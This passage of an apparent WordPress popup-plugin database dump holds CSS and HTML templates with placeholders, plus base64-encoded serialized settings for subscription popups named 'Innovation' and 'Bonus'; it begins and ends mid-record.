[bg_color_0] 100%); /* ie10+ */\r\n	background:radial-gradient(ellipse at center, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* w3c */\r\n	filter: progid:DXImageTransform.Microsoft.gradient( startColorstr=\'{{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }}\', endColorstr=\'[bg_color_0]\',GradientType=1 ); /* ie6-9 */\r\n  	[elseif bg_type_0 == \'img\']\r\n  	background-image: url(\"[bg_img_0]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupInner {\r\n  	{% if popup.params.tpl.enb_subscribe or popup.params.tpl.enb_foot_note or popup.params.tpl.enb_sm %}\r\n  	width: 50%;\r\n	[else]\r\n  	width: 100%;\r\n  	[endif]\r\n  	display: table-cell;\r\n}\r\n#ppsPopupShell_[ID] .label-window{\r\n    padding-top: 10px;\r\n    padding-bottom: 10px;\r\n    margin-top: 20px;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupLabel,\r\n#ppsPopupShell_[ID] h2 {\r\n	font-family: Open Sans, Arial, Tahoma, sans-serif;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupLabel {\r\n	color: #000;\r\n	font-size: 18px;\r\n	font-weight: 100;\r\n	color: #ffffff;\r\n	text-shadow: #000000 1px 1px 1px;\r\n	text-align: center;\r\n	margin-top: 15px;\r\n	margin-bottom: 16px;\r\n	padding-left: 5%;\r\n	padding-right: 5%;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupLabel h2:after{\r\n    margin-top: 50px;\r\n    position: absolute;\r\n    left: 25%;\r\n    right: 25%;\r\n    height: 4px;\r\n    background: [bg_color_1];\r\n    content: \' \';\r\n}\r\n#ppsPopupShell_[ID] .ppsRightCol {\r\n	/*display: table-cell;*/\r\n  	height: 100%;\r\n  	margin-top: 35%;\r\n  	[if bg_type_1 == \'color\']\r\n  	background: rgba(48, 20, 28, 0.7);\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell form {\r\n	padding: 30px 30px 0;\r\n	text-align: center;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	width: 100%;\r\n  	margin-bottom: 10px;\r\n  	height: 40px;\r\n  	border: none;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=text],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=password],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n  	background-color: transparent;\r\n	padding: 0 0 0 10px;\r\n	font-size: 17px;\r\n	border: 1px solid [bg_color_1];\r\n  	color: #fff;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect {\r\n	display: table;\r\n  	text-align: left;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelectLabel,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select {\r\n	display: table-cell;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelectLabel {\r\n	opacity: 0.5;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select {\r\n	width: 100%;\r\n  	background-color: transparent;\r\n  	height: 40px;\r\n  	border: none;\r\n  	font-size: 17px;\r\n  	color: #fff;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select option {\r\n	color: #000;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	font-family: inherit;\r\n  	height: auto;\r\n    padding-top: 5px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit] {\r\n	border-color: #000;\r\n  	font-family: \'Open Sans\', arial;\r\n	font-weight: 100;\r\n	color: #ffffff;\r\n  	width: 50%;\r\n	text-shadow: #000000 1px 1px 1px;\r\n  	padding: 0;\r\n  	float: none;\r\n  	[if bg_type_1 == \'color\']\r\n  	background: [bg_color_1];\r\n    \r\n  	[elseif bg_type_1 == \'img\']\r\n  	background-image: url(\"[bg_img_1]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n  	-webkit-transition: all 0.2s ease-in-out;\r\n	-moz-transition: all 0.2s ease-in-out;\r\n	-ms-transition: all 0.2s ease-in-out;\r\n	-o-transition: all 0.2s ease-in-out;\r\n  	\r\n  	cursor: pointer;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit]:hover {\r\n	box-shadow: inset 1px 1px 3px #666;\r\n  	background:#fff;\r\n	color: [bg_color_1];\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt_0 {\r\n  	text-align: center;\r\n  	font-family: \'Open Sans\', arial;\r\n 	font-weight: 100;\r\n	color: #ffffff;\r\n	text-shadow: #000000 1px 1px 1px;\r\n  	font-size: 14px;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt_0 {\r\n  	margin: 20px;\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsPopupClose {\r\n	background-repeat: no-repeat;\r\n  	cursor: pointer;\r\n 	top: 15px;\r\n	right: 15px;\r\n	background: [bg_color_2];\r\n  	background-repeat: round;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose.ppsPopupClose_lists_black {\r\n 	top: 0 !important;\r\n  	right: 0 !important;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose:hover {\r\n	opacity: 0.8;\r\n}\r\n#ppsPopupShell_[ID] .ppsFootNote{\r\n	color: #fff;\r\n    font-family: \"Helvetica Neue\",Helvetica,Arial,sans-serif;\r\n    font-size: x-small;\r\n    font-style: italic;\r\n    line-height: 14px;\r\n  	margin: 5px 30px;\r\n	text-align: center;\r\n}\r\n\r\n#ppsPopupShell_[ID]{\r\n	color:[bg_color_1];\r\n}','ready.png',1,1,1,1,0,0,0,'2015-01-10 17:59:43',2,0),(14,'Innovation',1,0,'YTozOntzOjQ6Im1haW4iO2E6MTc6e3M6Nzoic2hvd19vbiI7czo5OiJwYWdlX2xvYWQiO3M6MjM6InNob3dfb25fcGFnZV9sb2FkX2RlbGF5IjtzOjA6IiI7czoyNzoic2hvd19vbl9zY3JvbGxfd2luZG93X2RlbGF5IjtzOjE6IjAiO3M6MzM6InNob3dfb25fc2Nyb2xsX3dpbmRvd19wZXJjX3Njcm9sbCI7czoxOiIwIjtzOjI4OiJzaG93X29uX2FmdGVyX2luYWN0aXZlX3ZhbHVlIjtzOjI6IjEwIjtzOjg6ImNsb3NlX29uIjtzOjEwOiJ1c2VyX2Nsb3NlIjtzOjI1OiJjbG9zZV9vbl9hZnRlcl90aW1lX3ZhbHVlIjtzOjE6IjUiO3M6MTA6InNob3dfcGFnZXMiO3M6MzoiYWxsIjtzOjc6InNob3dfdG8iO3M6ODoiZXZlcnlvbmUiO3M6Mjk6InNob3dfdG9fZmlyc3RfdGltZV92aXNpdF9kYXlzIjtzOjI6IjMwIjtzOjMwOiJzaG93X3RvX3VudGlsX21ha2VfYWN0aW9uX2RheXMiO3M6MjoiMzAiO3M6MjE6ImhpZGVfZm9yX2RldmljZXNfc2hvdyI7czoxOiIwIjtzOjI0OiJoaWRlX2Zvcl9wb3N0X3R5cGVzX3Nob3ciO3M6MToiMCI7czoxNzoiaGlkZV9mb3JfaXBzX3Nob3ciO3M6MToiMCI7czoxMjoiaGlkZV9mb3JfaXBzIjtzOjA6IiI7czoyMzoiaGlkZV9mb3JfY291bnRyaWVzX3Nob3ciO3M6MToiMCI7czoyMzoiaGlkZV9mb3JfbGFuZ3VhZ2VzX3Nob3ciO3M6MToiMCI7fXM6MzoidHBsIjthOjU5OntzOjU6IndpZHRoIjtzOjM6IjY2MCI7czoxMzoid2lkdGhfbWVhc3VyZSI7czoyOiJweCI7czoxODoiYmdfb3ZlcmxheV9vcGFjaXR5IjtzOjM6IjAuNSI7czo5OiJiZ190eXBlXzAiO3M6NToiY29sb3IiO3M6ODoiYmdfaW1nXzAiO3M6MzY6IltQUFNfQVNTRVRTX1VSTF1pbWcvYXNzZXRzL3JlYWR5LmpwZyI7czoxMDoiYmdfY29sb3JfMCI7czo3OiIjMjIyMjIyIjtzOjk6ImJnX3R5cGVfMSI7czozOiJpbWciO3M6ODoiYmdfaW1nXzEiO3M6NDE6IltQUFNfQVNTRVRTX1VSTF1pbWcvYXNzZXRzL2lubm92YXRpb24ucG5nIjtzOjEwOiJiZ19jb2xvcl8xIjtzOjc6IiNmZjAwMDAiO3M6OToiYmdfdHlwZV8yIjtzOjU6ImNvbG9yIjtzOjg6ImJnX2ltZ18yIjtzOjA6IiI7czoxMDoiYmdfY29sb3JfMiI7czo3OiIjZmYwMDAwIjtzOjEwOiJmb250X2xhYmVsIjtzOjc6ImRlZmF1bHQiO3M6MTY6ImxhYmVsX2ZvbnRfY29sb3IiO3M6NzoiI2ZmZmZmZiI7czoxMDoiZm9udF90eHRfMCI7czo3OiJkZWZhdWx0IjtzOjE3OiJ0ZXh0X2ZvbnRfY29sb3JfMCI7czo3OiIjZmZmZmZmIjtzOjExOiJmb250X2Zvb3RlciI7czo3OiJkZWZhdWx0IjtzOjE3OiJmb290ZXJfZm9udF9jb2xvciI7czo3OiIjZmZmZmZmIjtzOjk6ImNsb3NlX2J0biI7czo5OiJyZWRfY2xvc2UiO3M6NzoiYnVsbGV0cyI7czoxMToibGlzdHNfZ3JlZW4iO3M6MTM6ImVuYl9zdWJzY3JpYmUiO3M6MToiMSI7czo4OiJzdWJfZGVzdCI7czo5OiJ3b3JkcHJlc3MiO3M6MjM6InN1Yl93cF9jcmVhdGVfdXNlcl9yb2xlIjtzOjEwOiJzdWJzY3JpYmVyIjtzOjE5OiJzdWJfYXdlYmVyX2xpc3RuYW1lIjtzOjA6IiI7czoyMToic3ViX2F3ZWJlcl9hZHRyYWNraW5nIjtzOjA6IiI7czoyMToic3ViX21haWxjaGltcF9hcGlfa2V5IjtzOjA6IiI7czoxNDoic3ViX2dyX2FwaV9rZXkiO3M6MDoiIjtzOjE0OiJzdWJfYWNfYXBpX3VybCI7czowOiIiO3M6MTQ6InN1Yl9hY19hcGlfa2V5IjtzOjA6IiI7czoxODoic3ViX2FyX2Zvcm1fYWN0aW9uIjtzOjA6IiI7czoxMDoic3ViX3NnYV9pZCI7czowOiIiO3M6MTU6InN1Yl9zZ2FfbGlzdF9pZCI7czowOiIiO3M6MjE6InN1Yl9zZ2FfYWN0aXZhdGVfY29kZSI7czowOiIiO3M6MTA6InN1Yl9maWVsZHMiO2E6Mjp7czo0OiJuYW1lIjthOjc6e3M6MzoiZW5iIjtzOjE6IjEiO3M6NDoibmFtZSI7czo0OiJuYW1lIjtzOjQ6Imh0bWwiO3M6NDoidGV4dCI7czo1OiJsYWJlbCI7czo0OiJOYW1lIjtzOjU6InZhbHVlIjtzOjA6IiI7czo2OiJjdXN0b20iO3M6MToiMCI7czo5OiJtYW5kYXRvcnkiO3M6MToiMCI7fXM6NToiZW1haWwiO2E6Nzp7czo0OiJuYW1lIjtzOjU6ImVtYWlsIjtzOjQ6Imh0bWwiO3M6NDoidGV4dCI7czo1OiJsYWJlbCI7czo2OiJFLU1haWwiO3M6NToidmFsdWUiO3M6MDoiIjtzOjY6ImN1c3RvbSI7czoxOiIwIjtzOjk6Im1hbmRhdG9yeSI7czoxOiIxIjtzOjM6ImVuYiI7czoxOiIxIjt9fXM6MjA6InN1Yl90eHRfY29uZmlybV9zZW50IjtzOjY3OiJDb25maXJtYXRpb24gbGluayB3YXMgc2VudCB0byB5b3VyIGVtYWlsIGFkZHJlc3MuIENoZWNrIHlvdXIgZW1haWwhIjtzOjE1OiJzdWJfdHh0X3N1Y2Nlc3MiO3M6MjQ6IlRoYW5rIHlvdSBmb3Igc3Vic2NyaWJlISI7czoyMToic3ViX3R4dF9pbnZhbGlkX2VtYWlsIjtzOjIyOiJFbXB0eSBvciBpbnZhbGlkIGVtYWlsIjtzOjE2OiJzdWJfcmVkaXJlY3RfdXJsIjtzOjA6IiI7czoyODoic3ViX3R4dF9jb25maXJtX21haWxfc3ViamVjdCI7czozNDoiQ29uZmlybSBzdWJzY3JpcHRpb24gb24gW3NpdGVuYW1lXSI7czoyNToic3ViX3R4dF9jb25maXJtX21haWxfZnJvbSI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6Mjg6InN1Yl90eHRfY29uZmlybV9tYWlsX21lc3NhZ2UiO3M6MTk3OiJZb3Ugc3Vic2NyaWJlZCBvbiBzaXRlIDxhIGhyZWY9XCJbc2l0ZXVybF1cIj5bc2l0ZW5hbWVdPC9hPi4gRm9sbG93IDxhIGhyZWY9XCJbY29uZmlybV9saW5rXVwiPnRoaXMgbGluazwvYT4gdG8gY29tcGxldGUgeW91ciBzdWJzY3JpcHRpb24uIElmIHlvdSBkaWQgbm90IHN1YnNjcmliZSBoZXJlIC0ganVzdCBpZ25vcmUgdGhpcyBtZXNzYWdlLiI7czozMToic3ViX3R4dF9zdWJzY3JpYmVyX21haWxfc3ViamVjdCI7czozNzoiW3NpdGVuYW1lXSBZb3VyIHVzZXJuYW1lIGFuZCBwYXNzd29yZCI7czoyODoic3ViX3R4dF9zdWJzY3JpYmVyX21haWxfZnJvbSI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6MzE6InN1Yl90eHRfc3Vic2NyaWJlcl9tYWlsX21lc3NhZ2UiO3M6NjU6IlVzZXJuYW1lOiBbdXNlcl9sb2dpbl08YnIgLz5QYXNzd29yZDogW3Bhc3N3b3JkXTxiciAvPltsb2dpbl91cmxdIjtzOjI1OiJzdWJfcmVkaXJlY3RfZW1haWxfZXhpc3RzIjtzOjA6IiI7czoxMzoic3ViX2J0bl9sYWJlbCI7czoxNDoiU3Vic2NyaWJlIE5vdyEiO3M6MTU6ImVuYl9zbV9mYWNlYm9vayI7czoxOiIxIjtzOjE3OiJlbmJfc21fZ29vZ2xlcGx1cyI7czoxOiIxIjtzOjE0OiJlbmJfc21fdHdpdHRlciI7czoxOiIxIjtzOjk6InNtX2Rlc2lnbiI7czo2OiJzaW1wbGUiO3M6ODoiYW5pbV9rZXkiO3M6ODoidGluX2Rvd24iO3M6MTM6ImFuaW1fZHVyYXRpb24iO3M6MDoiIjtzOjExOiJsYXllcmVkX3BvcyI7czozOiJ0b3AiO3M6OToiZW5iX2xhYmVsIjtzOjE6IjEiO3M6NToibGFiZWwiO3M6MjY6IkFSRSBZT1UgUkVBRFk/IEdFVCBJVCBOT1chIjtzOjk6ImVuYl90eHRfMCI7czoxOiIxIjtzOjEzOiJlbmJfZm9vdF9ub3RlIjtzOjE6IjEiO3M6OToiZm9vdF9ub3RlIjtzOjU4OiJZb3VyIEluZm9ybWF0aW9uIHdpbGwgbmV2ZXIgYmUgc2hhcmVkIHdpdGggYW55IHRoaXJkIHBhcnR5IjtzOjU6InR4dF8wIjtzOjI0MjoiPGgzPkluY3JlYXNlIG1vcmUgdGhhbiA3MDAlIG9mIEVtYWlsIFN1YnNjcmliZXJzITwvaDM+PHA+PGJyIC8+TG9yZW0gaXBzdW0gZG9sb3Igc2l0IGFtZXQsIGNvbnNlY3RldHVyIGFkaXBpc2NpbmcgZWxpdC4gRHVpcyB2aXZlcnJhPGJyIC8+IHVybmEgdml0YWUgdmVoaWN1bGEgY29uZ3VlLCBwdXJ1cyBuaWJoIHZlc3RpYnVsdW0gbGFjdXMsIHNpdCBhbWV0IHRyaXN0aXF1ZSBhbnRlIG9kaW8gdml2ZXJyYSBvcmNpLjwvcD4iO31zOjEwOiJvcHRzX2F0dHJzIjthOjI6e3M6OToiYmdfbnVtYmVyIjtzOjE6IjMiO3M6MTY6InR4dF9ibG9ja19udW1iZXIiO3M6MToiMSI7fX0=','<div id=\"ppsPopupShell_[ID]\" class=\"ppsPopupShell ppsPopupListsShell\">\r\n	<div id=\"close\"><a href=\"#\" class=\"ppsPopupClose ppsPopupClose_[close_btn]\"></a></div>\r\n	<div class=\"ppsInnerTblContent\">\r\n		<div class=\"ppsPopupListsInner ppsPopupInner\">\r\n			[if enb_label]\r\n				<div class=\"label-window\">\r\n					<div class=\"ppsPopupLabel ppsPopupListsLabel\">[label]</div>\r\n				</div>\r\n			[endif]\r\n			<div class=\"header\">\r\n			</div>\r\n			<div style=\"clear: both;\"></div>\r\n			[if enb_txt_0]\r\n				<div class=\"ppsPopupTxt ppsPopupClassyTxt ppsPopupClassyTxt_0 ppsPopupTxt_0\">\r\n				[txt_0]\r\n				</div>\r\n			[endif]\r\n			<div style=\"clear: both;\"></div>\r\n			<div class=\"ppsRightCol\">\r\n				[if enb_subscribe]\r\n					<div class=\"ppsSubscribeShell\">\r\n						[sub_form_start]\r\n						[sub_fields_html]\r\n						<input type=\"submit\" name=\"submit\" value=\"[sub_btn_label]\" />\r\n						[sub_form_end]\r\n						<div style=\"clear: both;\"></div>\r\n					</div>\r\n				[endif]\r\n			</div>\r\n			[if enb_sm]\r\n				<div class=\"ppsSm\">\r\n				[sm_html]\r\n				</div>\r\n			[endif]\r\n			[if enb_foot_note]\r\n				<div class=\"ppsFootNote\">\r\n				[foot_note]\r\n				</div>\r\n			[endif]\r\n		</div>\r\n	</div>\r\n</div>','#ppsPopupShell_[ID] {\r\n	width: [width][width_measure];\r\n  	padding: 15px;\r\n  	font-family: Georgia, Times, serif;\r\n	font-size: 13px;\r\n	line-height: 21px;\r\n	font-weight: normal;\r\n	color: #000;\r\n}\r\n#ppsPopupShell_[ID] .ppsInnerTblContent {\r\n	display: table;\r\n  	[if bg_type_0 == \'color\']\r\n	background:[bg_color_0]; /* w3c */\r\n	filter: progid:DXImageTransform.Microsoft.gradient( startColorstr=\'{{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }}\', endColorstr=\'[bg_color_0]\',GradientType=1 ); /* ie6-9 */\r\n  	[elseif bg_type_0 == \'img\']\r\n  	background-image: url(\"[bg_img_0]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupInner {\r\n  {% if popup.params.tpl.enb_subscribe or popup.params.tpl.enb_foot_note or popup.params.tpl.enb_sm %}\r\n  	width: 50%;\r\n	[else]\r\n  	width: 100%;\r\n  	[endif]\r\n  	display: table-cell;\r\n}\r\n#ppsPopupShell_[ID] .label-window{\r\n    padding-top: 10px;\r\n    padding-bottom: 10px;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupLabel {\r\n	color: #000;\r\n	font-family: Open Sans, Arial, Tahoma, sans-serif;\r\n	font-size: 24px;\r\n	font-weight: 900;\r\n	color: #ffffff;\r\n	text-shadow: #000000 1px 1px 1px;\r\n	text-align: center;\r\n	margin-top: 15px;\r\n	margin-bottom: 16px;\r\n	padding-left: 5%;\r\n	padding-right: 5%;\r\n	\r\n}\r\n\r\n#ppsPopupShell_[ID] .header{\r\n  	width: 100%;\r\n	height: 80px;\r\n	[if bg_type_1 == \'color\']\r\n	background:[bg_color_1]; \r\n	[elseif bg_type_1 == \'img\']\r\n  	background-image: url(\"[bg_img_1]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n}\r\n#ppsPopupShell_[ID] .ppsRightCol {\r\n	/*display: table-cell;*/\r\n  	height: 100%;\r\n  	[if bg_type_2 == \'color\']\r\n  	background:[bg_color_2]; \r\n  	[elseif bg_type_2 == \'img\']\r\n  	background-image: url(\"[bg_img_2]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell form {\r\n	padding: 30px 30px 0;\r\n	text-align: center;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	width: 100%;\r\n  	margin-bottom: 25px;\r\n  	height: 40px;\r\n  	border: none;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=text],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=password],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	padding-left: 10px;\r\n	font-size: 17px;\r\n	border: 1px solid transparent;\r\n  	color: #959595;\r\n  	border-radius: 50px;\r\n  	box-sizing: border-box;\r\n  	background-color: #fff;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect {\r\n	display: table;\r\n  	text-align: left;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelectLabel,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select {\r\n	display: table-cell;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelectLabel {\r\n	opacity: 0.5;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select {\r\n	width: 100%;\r\n  	background-color: transparent;\r\n  	height: 40px;\r\n  	border: none;\r\n  	font-size: 17px;\r\n  	color: #959595;\r\n  	margin-left: -20px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	font-family: inherit;\r\n  	height: auto;\r\n    padding: 5px 20px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit] {\r\n	border-color: #000;\r\n  	border-radius: 50px;\r\n  	font-family: \'Open Sans\', arial;\r\n	font-weight: 800;\r\n  	font-size:16px;\r\n	color: #ffffff;\r\n  	width: 35%;\r\n	height: 45px;\r\n	text-shadow: #000000 1px 1px 1px;\r\n  	background: transparent;\r\n  	-webkit-transition: all 0.5s ease-in-out;\r\n	-moz-transition: all 0.5s ease-in-out;\r\n	-ms-transition: all 0.5s ease-in-out;\r\n	-o-transition: all 0.5s ease-in-out;\r\n	border: 4px solid #fff;\r\n  	text-transform: uppercase;\r\n  	cursor: pointer;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit]:hover {\r\n	box-shadow: inset 1px 1px 3px #666;\r\n  	background:[bg_color_0];\r\n	color: #fff;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt_0 {\r\n  	text-align: center;\r\n  	font-family: \'Open Sans\', arial;\r\n 	font-weight: 100;\r\n	color: #ffffff;\r\n	text-shadow: #000000 1px 1px 1px;\r\n  	font-size: 14px;\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsPopupTxt_0 {\r\n  	margin: 20px;\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsPopupClose {\r\n	background-repeat: no-repeat;\r\n  	cursor: pointer;\r\n 	top: 15px;\r\n	right: 15px;\r\n}\r\n\r\n\r\n\r\n#ppsPopupShell_[ID] .ppsPopupClose.ppsPopupClose_lists_black {\r\n 	top: 0 !important;\r\n  	right: 0 !important;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose:hover {\r\n	opacity: 0.8;\r\n}\r\n#ppsPopupShell_[ID] .ppsFootNote{\r\n	color: #fff;\r\n    font-family: \"Helvetica Neue\",Helvetica,Arial,sans-serif;\r\n    font-size: x-small;\r\n    font-style: italic;\r\n    line-height: 14px;\r\n  	margin: 5px 30px;\r\n	text-align: center;\r\n}','innovation.png',1,1,1,1,0,0,0,'2015-01-10 17:59:43',25,0),(15,'Bonus',1,0,'YTozOntzOjQ6Im1haW4iO2E6Mjk6e3M6Nzoic2hvd19vbiI7czo5OiJwYWdlX2xvYWQiO3M6MjM6InNob3dfb25fcGFnZV9sb2FkX2RlbGF5IjtzOjA6IiI7czoyNToic2hvd19vbl9jbGlja19vbl9lbF9kZWxheSI7czoxOiIwIjtzOjI3OiJzaG93X29uX3Njcm9sbF93aW5kb3dfZGVsYXkiO3M6MToiMCI7czozMzoic2hvd19vbl9zY3JvbGxfd2luZG93X3BlcmNfc2Nyb2xsIjtzOjE6IjAiO3M6Mjg6InNob3dfb25fYWZ0ZXJfaW5hY3RpdmVfdmFsdWUiO3M6MjoiMTAiO3M6MjU6InNob3dfb25fbGlua19mb2xsb3dfZGVsYXkiO3M6MToiMCI7czo4OiJjbG9zZV9vbiI7czoxMDoidXNlcl9jbG9zZSI7czoyNjoiY2xvc2Vfb25fYWZ0ZXJfYWN0aW9uX3RpbWUiO3M6MToiMSI7czoyNToiY2xvc2Vfb25fYWZ0ZXJfdGltZV92YWx1ZSI7czoxOiI1IjtzOjEwOiJzaG93X3BhZ2VzIjtzOjM6ImFsbCI7czoxNDoic2hvd190aW1lX2Zyb20iO3M6NzoiMTI6MDBhbSI7czoxMjoic2hvd190aW1lX3RvIjtzOjc6IjEyOjAwYW0iO3M6MTQ6InNob3dfZGF0ZV9mcm9tIjtzOjA6IiI7czoxMjoic2hvd19kYXRlX3RvIjtzOjA6IiI7czo3OiJzaG93X3RvIjtzOjg6ImV2ZXJ5b25lIjtzOjI5OiJzaG93X3RvX2ZpcnN0X3RpbWVfdmlzaXRfZGF5cyI7czoyOiIzMCI7czozMDoic2hvd190b191bnRpbF9tYWtlX2FjdGlvbl9kYXlzIjtzOjI6IjMwIjtzOjE1OiJjb3VudF90aW1lc19udW0iO3M6MToiMSI7czoxNToiY291bnRfdGltZXNfbWVzIjtzOjM6ImRheSI7czoyMToiaGlkZV9mb3JfZGV2aWNlc19zaG93IjtzOjE6IjAiO3M6MjQ6ImhpZGVfZm9yX3Bvc3RfdHlwZXNfc2hvdyI7czoxOiIwIjtzOjE3OiJoaWRlX2Zvcl9pcHNfc2hvdyI7czoxOiIwIjtzOjEyOiJoaWRlX2Zvcl9pcHMiO3M6MDoiIjtzOjIzOiJoaWRlX2Zvcl9jb3VudHJpZXNfc2hvdyI7czoxOiIwIjtzOjIzOiJoaWRlX2Zvcl9sYW5ndWFnZXNfc2hvdyI7czoxOiIwIjtzOjI0OiJoaWRlX3NlYXJjaF9lbmdpbmVzX3Nob3ciO3M6MToiMCI7czoxODoiaGlkZV9wcmVnX3VybF9zaG93IjtzOjE6IjAiO3M6MTM6ImhpZGVfcHJlZ191cmwiO3M6MDoiIjt9czozOiJ0cGwiO2E6OTY6e3M6NToid2lkdGgiO3M6MzoiNzcwIjtzOjEzOiJ3aWR0aF9tZWFzdXJlIjtzOjI6InB4IjtzOjE4OiJiZ19vdmVybGF5X29wYWNpdHkiO3M6MzoiMC41IjtzOjk6ImJnX3R5cGVfMCI7czo1OiJjb2xvciI7czo4OiJiZ19pbWdfMCI7czowOiIiO3M6MTA6ImJnX2NvbG9yXzAiO3M6NzoiI2U1ZTVlNSI7czo5OiJiZ190eXBlXzEiO3M6NToiY29sb3IiO3M6ODoiYmdfaW1nXzEiO3M6Mzk6IltQUFNfQVNTRVRTX1VSTF1pbWcvYXNzZXRzL2J1dHRvbi0xLnBuZyI7czoxMDoiYmdfY29sb3JfMSI7czo3OiIjZmY0NDExIjtzOjk6ImJnX3R5cGVfMiI7czozOiJpbWciO3M6ODoiYmdfaW1nXzIiO3M6MzY6IltQUFNfQVNTRVRTX1VSTF1pbWcvYXNzZXRzL2JvbnVzLnBuZyI7czoxMDoiYmdfY29sb3JfMiI7czowOiIiO3M6OToiYmdfdHlwZV8zIjtzOjU6ImNvbG9yIjtzOjg6ImJnX2ltZ18zIjtzOjA6IiI7czoxMDoiYmdfY29sb3JfMyI7czo3OiIjM2QzZDNkIjtzOjEwOiJmb250X2xhYmVsIjtzOjc6ImRlZmF1bHQiO3M6MTY6ImxhYmVsX2ZvbnRfY29sb3IiO3M6NzoiI2ZmNDQxMSI7czoxMDoiZm9udF90eHRfMCI7czo3OiJkZWZhdWx0IjtzOjE3OiJ0ZXh0X2ZvbnRfY29sb3JfMCI7czo3OiIjMDAwMDAwIjtzOjExOiJmb250X2Zvb3RlciI7czo3OiJkZWZhdWx0IjtzOjE3OiJmb290ZXJfZm9udF9jb2xvciI7czo3OiIjOTc5Njk2IjtzOjE1OiJyZXNwb25zaXZlX21vZGUiO3M6MzoiZGVmIjtzOjE3OiJyZWlkcmVjdF9vbl9jbG9zZSI7czowOiIiO3M6OToiY2xvc2VfYnRuIjtzOjExOiJjbGFzc3lfZ3JleSI7czo3OiJidWxsZXRzIjtzOjQ6InRpY2siO3M6MTE6ImxheWVyZWRfcG9zIjtzOjM6InRvcCI7czo5OiJlbmJfbGFiZWwiO3M6MToiMSI7czo1OiJsYWJlbCI7czo1NzoiR2V0IGl0IE5PVyEgSW5jcmVhc2UgbW9yZSB0aGFuIDcwMCUgb2YgRW1haWwgU3Vic2NyaWJlcnMhIjtzOjk6ImVuYl90eHRfMCI7czoxOiIxIjtzOjEzOiJlbmJfZm9vdF9ub3RlIjtzOjE6IjEiO3M6OToiZm9vdF9ub3RlIjtzOjExNzoiV2UgcmVzcGVjdCB5b3VyIHByaXZhY3kuIFlvdXIgaW5mb3JtYXRpb24gd2lsbCBub3QgYmUgc2hhcmVkIHdpdGggYW55IHRoaXJkIHBhcnR5IGFuZCB5b3UgY2FuIHVuc3Vic2NyaWJlIGF0IGFueSB0aW1lIjtzOjY6ImVuYl9zbSI7czoxOiIxIjtzOjE1OiJlbmJfc21fZmFjZWJvb2siO3M6MToiMSI7czoxNzoiZW5iX3NtX2dvb2dsZXBsdXMiO3M6MToiMSI7czoxNDoiZW5i